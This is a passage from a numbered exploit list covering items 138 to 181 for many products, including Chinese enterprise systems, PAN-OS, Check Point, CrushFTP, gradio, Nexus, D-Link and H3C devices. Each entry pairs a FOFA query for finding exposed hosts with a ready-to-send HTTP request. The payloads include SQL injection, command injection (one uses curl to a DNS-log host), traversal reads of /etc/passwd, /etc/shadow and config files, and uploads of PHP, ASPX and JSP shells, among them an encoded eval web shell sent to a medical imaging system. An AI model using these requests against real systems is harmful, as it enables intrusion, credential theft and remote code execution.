Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is then reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical imaging archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 all-in-one smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file; the <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering project management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
